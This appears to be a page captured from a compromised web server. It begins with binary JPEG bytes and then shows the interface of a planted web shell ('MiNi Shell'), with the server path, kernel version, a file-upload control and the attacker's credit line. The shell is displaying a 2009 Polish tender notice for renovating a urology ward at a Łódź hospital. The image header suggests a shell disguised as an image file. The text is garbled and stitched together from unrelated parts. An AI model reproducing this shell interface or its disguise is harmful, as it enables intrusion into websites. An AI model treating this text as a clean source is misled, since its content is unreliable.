JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091020/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091020/182769-N-2009.html

<p class="kh_header"><b>Łódź: Przebudowa pomieszczeń Oddziału Urologii wg projektu  zamiennego pn. Projekt budowlany zamienny dotyczący prac modernizacyjno - remontowych trzech sal chorych z założeniem węzła sanitarnego w pokojach oddziału Urologii i Transplantacji Nerek przy Wojewódzkim Specjalistycznym Szpitalu im. M. Pirogowa
w Łodzi</b><br>
<b>Numer ogłoszenia: 182769 - 2009; data zamieszczenia: 20.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Specjalistyczny Szpital im. M. Pirogowa w Łodzi , ul. Wólczańska 191, 90-531 Łódź, woj. łódzkie, tel. 042 6371322, faks 042 6371322.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pirogow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa pomieszczeń Oddziału Urologii wg projektu  zamiennego pn. Projekt budowlany zamienny dotyczący prac modernizacyjno - remontowych trzech sal chorych z założeniem węzła sanitarnego w pokojach oddziału Urologii i Transplantacji Nerek przy Wojewódzkim Specjalistycznym Szpitalu im. M. Pirogowa
w Łodzi.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przebudowa pomieszczeń Oddziału Urologii wg projektu  zamiennego pn. Projekt budowlany zamienny dotyczący prac modernizacyjno - remontowych trzech sal chorych z założeniem węzła sanitarnego w pokojach oddziału Urologii i Transplantacji Nerek
przy Wojewódzkim Specjalistycznym Szpitalu im. M. Pirogowa
w Łodzi
- Przebudowa pomieszczeń Oddziału Urologii wg projektu  zamiennego pn. Projekt budowlany zamienny dotyczący prac modernizacyjno - remontowych trzech sal chorych z założeniem węzła sanitarnego w pokojach oddziału Urologii i Transplantacji Nerek przy Wojewódzkim Specjalistycznym Szpitalu im. M. Pirogowa w Łodzi

Przebudowa części pomieszczeń oddziału Urologii zlokalizowanego na III piętrze w Wojewódzkim specjalistycznym szpitalu im. M. Pirogowa w Łodzi z podziałem na dwie części kosztorysowania  A i B. 

Zakresy prac  wg projektu zamiennego  pod tytułem .-  Projekt budowlany zamienny dotyczący prac modernizacyjno - remontowych trzech sal chorych z założeniem węzła sanitarnego w pokojach oddziału Urologii i Transplantacji Nerek przy Wojewódzkim Specjalistycznym Szpitalu im. M. Pirogowa w Łodzi

    A - Prace modernizacyjno - remontowe trzech sal chorych z założeniem węzła sanitarnego w pokojach.
	przebudowę istniejącej łazienki i w.c. pacjentów na w.c. personelu oraz na pokój łóżkowy jednoosobowy z wydzieloną łazienką;
	przebudowę istniejącego magazynu pielęgniarki oddziałowej na pomieszczenie brudownika, oraz wydzielenie pomieszczenia na bieliznę czystą z komunikacji;
	przebudowę istniejącego gabinetu zabiegowego na pokój łóżkowy  dwuosobowy;
	przebudowę istniejącego w.c. personelu i brudownika na dwie łazienki dla sal łóżkowych;
	przebudowę istniejącej dyżurki pielęgniarek na pokój łóżkowy jednoosobowy;
	przebudowę istniejącego pokoju pielęgniarki oddziałowej na dyżurkę nr 1 pielęgniarek z pokojem przygotowawczym.

      B - Prace modernizacyjno - remontowe pomieszczeń Urologii wg projektu budowlanego zamiennego. 
	przebudowę (zmniejszenie) i remont istniejącej Sali zabiegowej;
	wydzielenie pokoju pielęgniarki oddziałowej z części istniejącej sali zabiegowej 
i sali łóżkowej i przebudowę istniejącej Sali łóżkowej na pokój socjalny pielęgniarek;
	przebudowę i remont istniejącej narożnej dyżurki nr 2 pielęgniarek z pokojem przygotowawczym w ramach istniejącej powierzchni;
	przebudowę istniejącego pokoju socjalnego pielęgniarek na pomieszczenie archiwum, oraz powiększenie komunikacji w strefie wejściowej na oddział.

Zamawiający wymaga odrębnego fakturowania zakresu wskazanego w literze A  i  w literze B 

3.   Szczegółowy opis przedmiotu zamówienia zawierają :
 Załącznik  nr 4 do SIWZ  szt. 3   
    Projekt - architektura i technologia 
    Projekt - instalacje sanitarne (kserokopia) 
    Projekt - instalacje elektryczne (kserokopia) 
Załącznik nr  3 do SIWZ  szt.  4
 Specyfikacja techniczna wykonania i odbioru robót budowlanych	
 Specyfikacja techniczna wykonania i odbioru robót instalacji wod.
 Specyfikacja techniczna wykonania i odbioru robót instalacji c.o.
 Specyfikacja techniczna wykonania i odbioru robót instalacji elektrycznych
 Załącznik nr 2 do SIWZ  szt.  8 
Kosztorys nakładczy (przedmiar) części A - architektura 
Kosztorys nakładczy (przedmiar) części B - architektura 
Kosztorys nakładczy (przedmiar) części A - instalacji wod - kan 
Kosztorys nakładczy (przedmiar) części B - instalacji wod - kan 
Kosztorys nakładczy (przedmiar) części A - instalacji c.o. 
Kosztorys nakładczy (przedmiar) części B - instalacji c.o. 
Kosztorys nakładczy (przedmiar) części A - instalacji elektrycznych 
Kosztorys nakładczy (przedmiar) części B - instalacji elektrycznych.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.11.11.00-9, 45.26.25.00-6, 45.42.11.52-4, 45.42.11.46-9, 45.32.00.00-6, 45.43.12.00-9, 45.41.00.00-4, 45.44.21.00-8, 45.43.21.00-5, 45.31.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do postępowania jest zobowiązany wnieść wadium w wysokości 8.000,00 zł (słownie: osiem  tysięcy złotych zero groszy).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> I.	Warunki udziału w postępowaniu

1.	O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy:
a)	spełniają warunki zawarte w art. 22 ust. 1 ustawy:
	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, 
	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wy?konania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, w szczególności uprawnionymi do sprawowania samodzielnych funkcji technicznych w budownictwie w specjalności ogólno budowlanej  do wykonania robót budowlanych (art. 12 i 13 ustawy z dnia 7 lipca 1994r. -Prawo Budowlane ( Dz U. z 2006 r. Nr 156 , poz.118 z późn. zmianami), którzy są członkami Polskiej Izby Inżynierów Budownictwa (art. 6 ustawy z dnia 15 grudnia 2000 r. samorządach zawodowych, architektów, inżynierów budowlanych i Urbanistów, Dz. U. z 2001 r. Nr 5, poz. 42 z późn. zm.), tj.: w szczególności co najmniej jedną osobę posiadającą decyzję uprawnienia budowlane o stwierdzeniu przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie  oraz posiadającą aktualne zaświadczenie z PIIB o przynależności do tej Izby.
	znajdują się w sytuacji ekonomicznej i finansowej za?pewniającej wykonanie zamówienia,
	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
b)	Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na  kwotę, co najmniej  200 000,00 zł
c)	Wykonawca wykonał w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres działalności jest krótszy w tym okresie, co najmniej dwa zadania polegające na pracach  o charakterze ogólnobudowlanych o wartości co najmniej 100. 000,00 złotych brutto każde zadanie.
2.	Sprawdzenie spełnienia warunków udziału w postępowaniu zostanie dokonane na podstawie złożonego oświadczenia, oraz dołączonych do oferty dokumentów wymienionych w podrozdziale II niniejszego Rozdziału, według zasady spełnia/nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> II.	Wykonawca jest zobowiązany złożyć wraz z ofertą na potwierdzenie powyższych warunków :

A
1.	Oświadczenie Wykonawcy - wypełnione i podpisane odpowiednio przez osoby upoważnione do reprezentowania Wykonawcy o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia publicznego/ Stosownie do treści art. 22 ust. 1 pkt 1-4 ustawy z dnia 29.1.2004 r. Prawo zamówień publicznych  zgodnie ze wzorem będącym załącznikiem  nr 5 do SIWZ 
2.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
3.	Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków i opłat lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
4.	Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z uiszczaniem składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu ?wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 

5.	Pełnomocnictwo osób podpisujących ofertę w imieniu Wykonawcy, udzielone przez osobę  upoważnioną zgodnie z właściwym rejestrem. Należy dołączyć do oferty oryginał lub kopię poświadczoną za zgodność z oryginałem przez udzielającego     pełnomocnictwa lub notariusza


W celu potwierdzenia zdolności ekonomicznej i finansowej, Wykonawca zobowiązany jest złożyć wraz z ofertą:
Polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę co najmniej                  200.000,00 zł.
      
       W celu potwierdzenia zdolności technicznej oraz dysponowania osobami zdolnymi do
       wykonywania zamówienia, Wykonawca zobowiązany jest złożyć wraz z ofertą:

       1. Wykaz wykonanych w okresie ostatnich 5 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zawierający co najmniej dwie roboty  polegające na pracach o charakterze ogólnobudowlanym  o wartości co najmniej   100 000,00 złotych brutto każde zadanie. Wykaz winien zawierać: nazwy i adresy inwestora, opis wykonanego przedmiotu, jego wartość oraz daty wykonania zamówienia. W odniesieniu do wskazanych w wykazie zamówień należy dołączyć dokumenty potwierdzające ich należyte wykonanie
2.   Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia wraz z danymi na temat ich kwalifikacji. Wymagane jest dysponowanie osobą / osobami posiadającymi decyzję uprawnienia budowlane o stwierdzeniu przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie oraz posiadającą aktualne zaświadczenie z PIIB o przynależności do tej Izby. Wymagane kserokopie uprawnień budowlanych jw. oraz aktualne zaświadczenia z właściwej Izby Inżynierów Budownictwa.
 
B
Dokumenty potwierdzające spełnianie warunków udziału w postępowaniu Wykonawców mających siedzibę lub miejsce zamieszkania za granicą: 
1.	Oświadczenie wykonawcy zgodnie z zapisami pkt II A ppkt 1; 
2.	Zamiast dokumentów, o których mowa w pkt II A ppkt 2, 3,4  składa: 
a)	dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 
b)	dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, 
c)	dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
3.	Pełnomocnictwo - do reprezentowania wykonawcy w postępowaniu albo do reprezentowania Wykonawcy w postępowaniu i do zawarcia umowy zgodnie z treścią sekcji pkt II A ppkt 5; 
4.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w sekcji pkt II A ppkt 2,3,4 zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. 

       C 
Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia w rozumieniu art. 23 ust 1 ustawy Prawo zamówień publicznych: 

1.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego (np. wspólnicy spółki cywilnej lub członkowie konsorcjum) są zobowiązani ustanowić Pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i do zawarcia umowy. 
2.	W takim przypadku - oprócz dokumentów wymienionych w sekcji pkt II A lub odpowiednio w pkt II B  - Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego są zobowiązani do złożenia wraz z  ofertą Pełnomocnictwa ustanawiającego Pełnomocnika, o którym mowa w pkt. 1 . Pełnomocnictwo zawierać powinno umocowanie do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy. 
3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego składają (podpisane przez ustanowionego Pełnomocnika lub potwierdzone przez niego za zgodność z oryginałem): 
a)	każdy z osobna - dokument wymieniony w pkt II A ppkt 2-4 
b)	podpisane przez Pełnomocnika reprezentującego Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia publicznego/ Stosownie do treści art. 22 ust. 1 pkt 1-4 ustawy z dnia 29.1.2004 r. Prawo zamówień publicznych zgodnie ze wzorem będącym załącznikiem do SIWZ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.pirogow.pl/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Specjalistyczny Szpital im. M. Pirogowa w Łodzi, 90 -531 Łódź, ul. Wólczańska 191/195  Dział Zamówień Publicznych.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.11.2009 godzina 10:00, miejsce: Wojewódzki Specjalistyczny Szpital im. M. Pirogowa w Łodzi, 90 -531 Łódź, ul. Wólczańska 191/195  Dział Zamówień Publicznych.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com